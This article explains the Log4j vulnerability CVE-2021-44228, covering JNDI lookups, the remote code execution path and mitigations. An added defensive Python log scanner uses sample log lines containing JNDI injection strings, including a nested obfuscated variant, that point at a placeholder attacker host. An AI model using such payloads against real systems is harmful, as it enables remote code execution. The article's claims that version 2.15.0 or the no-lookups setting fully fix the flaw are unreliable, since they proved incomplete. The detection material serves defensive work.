Log4j: how the bug shaking the Internet works

News of the Log4j bug started circulating on the Internet as early as December 9, initially as a vulnerability in Minecraft servers. Within a short time, however, the power of the bug and the extent of its spread became clear, pushing the risk level up to 10 (on a scale of 1 to 10). The Java Log4j library is, in fact, present on a vast number of platforms and web servers around the world.

After Heartbleed and Shellshock, it is probably the most dangerous vulnerability currently in circulation, so much so that the Apache Software Foundation itself moved quickly to remedy it by releasing a patch that solves the problem. The vulnerability, tracked as CVE-2021-44228, affects version 2 of the library and has been fixed in release 2.15.0.


What is Log4j and where is it used

Log4j is one of the most used logging libraries in Java and is extremely useful and widespread. At the origin of the vulnerability is a feature introduced in Log4j in 2013: the JNDI lookup plugin. Before understanding how the bug works it is necessary to take a step back and look at the purpose of the library and of JNDI. The Java Naming and Directory Interface has been part of Java since the 1990s and is a service that allows you to look up data (Java objects) by name through a directory structure. The underlying directory services vary, from CORBA COS (Common Object Service) to the Java RMI (Remote Method Invocation) Registry up to LDAP, the service used in the CVE.

The power of this bug lies in the fact that it can also be exploited against systems not directly exposed to the Internet. Some pieces of information (such as the User-Agent or the username) are typically also logged by backend systems, which may themselves be written in Java. If the crafted data can be made to travel from the frontend to the backend, systems can be taken over with relative ease.

Log4j: how the bug works

The JNDI LDAP lookup service allows you to retrieve objects through URLs of the form ldap://localhost:389/o=JavaObject. However, it is also possible to pass structures of the form ${prefix:name} and have a JNDI lookup performed against any server on the Internet specified in name. From here the type of vulnerability becomes clear: it is classified as Remote Code Execution (RCE). By crafting this field appropriately, it is possible to load a Java object from a server under the control of the attackers.


Proofs of Concept (PoC) are already available on the web, and there are many reports of massive scanning campaigns in search of this vulnerability.
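As an added example (not part of the original article), the Python scanner below looks for Log4j lookup syntax in logged user-controlled fields such as the User-Agent or username, which is where the ${prefix:name} string described above ends up; the log lines are constructed samples and attacker.example is a placeholder host. It flags any nested lookup, not just the literal jndi prefix, because rendered log output should never contain lookup syntax at all.

```python
from collections import namedtuple

# Constructed sample log lines (not real traffic): an access log and an application
# log, both of which record user-controlled fields (User-Agent, query string, username).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '2021-12-10 12:00:03 INFO  LoginService - login failed for user ${jndi:rmi://attacker.example/x}',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=${${env:NAME}:ldap://attacker.example/a} HTTP/1.1" 400 0 "-" "curl/7.79"',
]

# prefix: lookup prefix (e.g. "jndi") or "nested"; severity: "critical" or "suspicious".
Finding = namedtuple("Finding", "line_no lookup prefix severity")


def extract_lookups(text):
    """Return every top-level ${...} expression in text, honouring nested braces."""
    lookups, i = [], 0
    while (start := text.find("${", i)) != -1:
        depth, j = 0, start
        while j < len(text):
            if text.startswith("${", j):
                depth, j = depth + 1, j + 2
                continue
            if text[j] == "}":
                depth -= 1
                if depth == 0:
                    lookups.append(text[start:j + 1])
                    break
            j += 1
        else:  # unterminated lookup: keep the fragment, it is still not legitimate input
            lookups.append(text[start:])
            break
        i = j + 1
    return lookups


def classify(lookup):
    """Map one ${...} expression to (prefix, severity)."""
    body = lookup[2:-1] if lookup.endswith("}") else lookup[2:]
    if "${" in body:
        # Matching the literal "jndi" is not enough: any nested lookup is critical.
        return "nested", "critical"
    prefix = body.split(":", 1)[0].strip().lower()
    return prefix, ("critical" if prefix == "jndi" else "suspicious")


def scan_lines(lines):
    """Rendered log output should never contain lookup syntax, so every hit is a finding."""
    return [Finding(n, lk, *classify(lk))
            for n, line in enumerate(lines, 1) for lk in extract_lookups(line)]
```

Running scan_lines(SAMPLE_LOG_LINES) returns one critical finding for each of lines 2, 3 and 4 of the sample; feed it real access or application log lines to triage the scanning campaigns mentioned above.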

Impacts and possible remedies

The impact of this attack is enormous, to say the least, considering how widespread Java is in the world and among companies. Many are running for cover with major patching campaigns on their servers. Versions of Log4j from 2.10 onwards can be easily corrected by setting the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.

Where possible, the library should instead be updated to version 2.15.0, which definitively solves the problem and secures the applications. Versions from 2.0 to 2.10 instead need the JndiLookup class removed to be safe.

Some researchers report that remediation of this vulnerability could go on for months, if not years, given the huge popularity of the library. Of course, your best bet is to follow the directions from the Apache Software Foundation as soon as possible and make sure your systems are up to date.

The article "Log4j: how the bug shaking the Internet works" originally appeared on Tech CuE | Close-up Engineering.